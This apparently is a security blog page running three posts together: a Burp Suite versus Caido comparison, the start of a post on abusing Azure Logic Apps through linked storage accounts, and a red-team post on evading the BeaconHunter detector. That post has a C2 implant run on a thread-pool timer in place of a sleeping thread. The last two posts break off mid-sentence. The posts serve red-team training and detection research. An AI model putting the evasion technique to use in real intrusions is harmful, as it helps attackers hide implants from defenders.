In the ever-evolving landscape of web application security testing, selecting the right tools is crucial for ensuring robust security measures. Two prominent contenders in this field are Burp Suite and Caido. Both offer free and paid versions, each catering to different needs and budgets. This article delves into a comparative analysis of these tools, examining their features, usability, and value propositions to help users make informed decisions. Understanding the Basics Burp Suite, developed by PortSwigger, is a veteran in the cybersecurity realm, widely recognized for its comprehensive toolset designed to identify and exploit vulnerabilities in web applications. Caido, on the other hand, is a relatively new entrant, offering a modern and user-friendly approach to security testing. Despite its novelty, Caido has quickly gained attention for its intuitive design and efficient workflows. Features Comparison Burp Suite Community Edition (Free) Professional Edition (Paid) Caido Free Version Paid Version Usability and Learning Curve Burp Suite is known for its robustness and reliability. However, it comes with a steeper learning curve, especially for beginners. Its extensive documentation and support are invaluable for professional users who require in-depth capabilities and advanced features. The professional version’s automated scanner and CI/CD integration streamline workflows, making it suitable for large-scale projects. Caido, in contrast, is designed with user-friendliness at its core. Its modern UI and intuitive features make it accessible to both beginners and seasoned professionals. The focus on ease of use does not compromise its efficiency, making it a strong contender in the security testing field. The seamless integration with CI/CD pipelines and comprehensive reporting features in the paid version enhance its usability for professional environments. Cost-Benefit Analysis Burp Suite Professional comes with a significant cost, justified by its extensive features and support for professional use. The investment is particularly worthwhile for large-scale projects and comprehensive security testing requirements. The Community Edition, while limited, provides essential tools for small projects or learning purposes. The extensive feature set of the professional version, including advanced intrusion tools and automated scanning, makes it a top choice for professionals despite its higher price point. Caido offers a more affordable alternative without sacrificing essential functionalities. Its paid version provides enhanced automation and integration capabilities at a lower cost, making it an attractive option for budget-conscious users who still require robust security testing tools. The modern UI and user-centric design reduce the learning curve, making it accessible to a broader audience. The cost-effectiveness of Caido, combined with its advanced features, positions it as a viable competitor to Burp Suite. Conclusion Both Burp Suite and Caido bring unique strengths to the table. Burp Suite remains a top choice for its comprehensive and professional-grade features, despite its higher cost and steeper learning curve. It is particularly suited for users who need extensive support and advanced tools for large-scale security testing. The professional version’s capabilities, including the automated scanner and CI/CD integration, provide a robust solution for complex security needs. Caido, with its modern approach and user-friendly design, offers an efficient and cost-effective solution for both beginners and professionals. Its affordability and ease of use make it a compelling choice for a wide range of users, from hobbyists to seasoned security professionals. The intuitive interface and seamless integration with development pipelines enhance its usability and efficiency. In the dynamic field of web application security testing, the choice between Burp Suite and Caido ultimately depends on the user’s specific needs, budget, and preference for usability. Both tools have proven their worth, and understanding their nuances can help users navigate the complex landscape of cybersecurity with confidence. This article aims to provide a comprehensive, balanced view of Burp Suite and Caido, helping readers make informed decisions based on their unique requirements. By highlighting the key differences and advantages of each tool, we ensure that our audience is well-equipped to choose the best solution for their security testing needs.
Abusing Azure Logic Apps – Part 1
This will be a multi-part blog series on abusing logic apps. In this blog, we will cover a few scenarios on how we can leverage our privileges on our storage account linked with a logic app to gain access on Logic Apps and create our new workflow, upload code that will allow us to execute system commands, and more. We will understand the relationship between logic apps and storage accounts. Lets start from scratch by first understanding storage accounts, logic apps, and their use cases. Azure Storage Accounts Azure Storage Account offers a dependable and affordable solution for storing and retrieving data, regardless of its format. Azure Storage meets a broad range of storage needs, from photos and documents to movies and application data. It offers four main data storage services: tables, queues, blob containers, and file shares. Let’s discuss these services. Table Storage Azure Table Storage is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because table storage is schemaless, it’s easy to adapt our data as the needs of our application evolve. We can use table storage to store flexible datasets like user data for web applications, address books, device information, or other types of metadata that our service requires. We can store any number of entities in a table, and a storage account may contain any number of tables, up to the capacity limit of the storage account. Azure Queue Storage The Azure Queue Storage service can be used for storing a large number of messages. A queue message can be 64kb in size. We can access the queues from anywhere in the world with authenticated HTTP/HTTPS request. Queues are commonly used to create a backlog of work to process asynchronously. For example, when a new order comes in, it gets added to the queue, and our application picks it up, processes the order, and removes it from the queue. Blob Storage Blob storage is a object storage solution, optimized for storing a massive amount of unstructured data. Blob storage can be accessed over HTTP/HTTPS from anywhere in the world. It is designed for the following: Azure Files Azure Files is a fully managed file share in cloud. It can be accessed via industry standard protocols such as SMB, NFS, or REST API. We can mount the Azure file shares on Windows, Linux, or MacOS clients by leveraging SMB protocol. NFS protocol can be used to mount the disk only on Linux machines. Azure File Sync can be leveraged to cache the data in an Azure file share mounted on Windows servers via SMB. Logic Apps In the world of cloud-based automation and integration, Azure Logic Apps stand out as a powerful tool for orchestrating workflows and connecting various services and applications. In this comprehensive guide, we’ll delve into what logic apps are, how they work, and explore their capabilities with real-world examples. Azure Logic Apps is a cloud-based service that allows us to automate workflows and integrate data, applications, and systems across cloud and on-premises environments. Think of Logic Apps as our digital assistant, automating repetitive tasks and streamlining complex business processes without writing extensive code. Logic apps follow a “trigger-action” model, where a trigger initiates the workflow and one or more actions are performed in response to the trigger. Triggers can be events from various sources such as emails, messages, or changes in data. Actions are the tasks performed, which can include sending emails, processing data, calling APIs, or even running custom code. Example Imagine an e-commerce platform that receives orders from customers via a web application. With Azure Logic Apps, we can create a workflow that triggers whenever a new order is placed. The logic app can then retrieve order details, send confirmation emails to customers, update inventory in a database, and notify shipping services for order fulfillment. Getting Familiar with Logic Apps’ Standard Plan Azure Logic Apps comes in two plans: Standard and Consumption, each tailored to different needs. The Standard plan offers advanced features, such as premium connectors, Integration Service Environments (ISE), and enhanced monitoring capabilities, making it ideal for enterprise-grade automation scenarios with complex integration requirements. In simple words, when creating a logic app with the Standard plan, an app service plan is also created along with a storage account. In backend, it leverages function apps. The Consumption plan follows a serverless architecture and a pay-per-use pricing model. With automatic scaling and simplified management, the Consumption plan is well-suited for organizations looking for a scalable and budget-friendly solution without upfront costs. So, why are we interested in this? Well, these plans have different functionalities that we will cover in this blog series. For part 1, we will focus on Standard plan-based logic apps. As mentioned above, when we select the Standard plan, an App Service plan is made and, along with that, a storage account is created to sync all the workflows and other files from file share which, again, makes it vulnerable if an attacker gets read/write access on an Azure storage account. Now we might be wondering, how is it possible? So to answer our question, let’s dig deeper into logic app deployment. Let’s first understand how a basic workflow is created in the logic app and then understand how it works. In the image above, the highlighted service will be created along with the Standard Logic App Plan. Once created, we can make our new workflow by navigating to Workflows and selecting the Stateless State type as shown in the following screenshot. Once created, we’ll select our workflow (“stateless1”) and navigate to Designer. As discussed above, all Logic Apps have to start with a trigger, which initiates the workflow when a specific event occurs. In both the Standard and Consumption plans, triggers can be configured to respond to various events such as HTTP requests, messages in queues, changes in data, scheduled times, etc. Once the trigger is set off, it will
Sleeping Safely in Thread Pools
A thread pool is a collection of worker threads that efficiently execute asynchronous callbacks on behalf of the application. The thread pool is primarily used to reduce the number of application threads and provide management of the worker threads. Applications can queue work items, associate work with waitable handles, automatically queue based on a timer, and bind with I/O. – MSDN | Thread Pools The red team community has developed a general awareness of the utility of thread pools for process injection on Windows. Safebreach published detailed research last year describing how they may be used for remote process injection. White Knight Labs teaches the relevant techniques in our Offensive Development training course. This blog post, however, discusses another use of thread pools that is relevant to red teamers: their use as an alternative to a sleeping main thread in a C2 agent or other post-exploitation offensive capability. This technique has been observed in use by real world threat actors before and is not a novel technique developed by myself or White Knight Labs. However, since we have not observed public discussion of the technique in red team communities, we have determined it to be a worthwhile topic that deserves more awareness. Let us now compare the standard technique of using a sleeping thread with this alternative option. The Problem with Sleeping Threads C2 developers often face a dilemma where their agent must be protected while it is sleeping. It sleeps because it awaits new work. While the agent sleeps, all sorts of protections have been constructed to ward off dangerous memory scanners that may hunt it in its repose. Many of those mechanisms protect its memory, such as encryption of memory artifacts or ensuring the memory storage locations fly innocuous flags. Today we do not speak of memory protections, rather of threads and their call stacks. Specifically, we are concerned about reducing the signature of our threads. The concern for which C2 developers delve into the complexities of call stack evasion is that their agent must periodically sleep its main thread. That main thread’s call stack may include suspicious addresses indicating how it came to be run. For example, code in some unbacked memory such as dynamically allocated shellcode may have hidden the C2 agent in safely image-backed memory before executing it. But the thread that ran that agent could still keep a call stack that includes an address in unbacked memory. Therefore the call stack must be “cleaned” in some way. Using thread pools to periodically run functionality instead of a sleeping main thread avoids this issue. By creating a timer-queue timer (which uses thread pools to run a callback function on a timer), the main thread can allow itself to die safe in the knowledge that its mission of executing work will be taken up by the thread pool. Once the sleep period is completed, the thread pool will create a new thread and run whatever callback function it was setup for. This would likely be the “heartbeat” function that checks for new work. The thread pool will automatically create a new thread with a clean call stack or handoff the execution to an existing worker thread. Comparing the Code Let us suppose we have a simple, mock C2 agent that includes the following simplified code: This part of our code is common between our two case studies. We have a heartbeat function that is called periodically after SLEEP_PERIOD amount of milliseconds. The heartbeat function checks for new work from the C2 server, executes it, and then sets up any obfuscation before it sleeps again. We will use MDSec’s BeaconHunter and Process Hacker to inspect our process after using both techniques. BeaconHunter monitors for processes with threads in the Wait:DelayExecution state, tracks their behavior, and calculates a detection score that estimates how likely they are to be a beacon. It was designed to demonstrate detection of Cobalt Strike’s implant BEACON. Sleeping Thread Example Now suppose our agent uses a sleeping thread to wait. The simplified code would look something like this: That is the code that runs in our hypothetical C2 implant’s main thread. All it does is sleep and then run the heartbeat function once it wakes. Now we’ll run our mock C2 agent and inspect it. With Process Hacker you can see that the main thread spends most of its time sleeping in the Wait:DelayExecution state. Now let’s take a look at what BeaconHunter thinks about us: BeaconHunter has observed our main sleeping thread, as well as our callbacks on the network, and decided that we are worthy of a higher score for suspicious behavior. Thread Pools Timer Example Now let’s try rewriting our mock C2 implant to use a thread pool and timer instead. In this example we use CreateTimerQueueTimer to create a timer-queue timer. When the timer expires every SLEEP_PERIOD milliseconds our callback function ticktock will be executed by a thread pool worker thread. Once we have setup the timer, we exit our original thread to allow the timer to take over management of executing our heartbeat function. Another option would be to trigger the callback on some kind of event rather than a timer. For that, you may use the RegisterWaitForSingleObject function. Now that we have re-configured our mock C2 implant to use a thread pool, let’s inspect our process again with Process Hacker: This screenshot contains several interesting bits of information. Because the waiting state of our worker thread is not Wait:DelayExecution, BeaconHunter does not notice our process at all and it is absent in the list of possible beacons: Which Thread Pool APIs Should You Use? If you read the MSDN article linked at the top, then you will know that there are two documented APIs for thread pools. A “legacy” API and a “new” API. The legacy API was re-architected in Windows Vista before the new architecture thread pools were implemented entirely in usermode. Now they are managed in the kernel by the TpWorkerFactory object type and are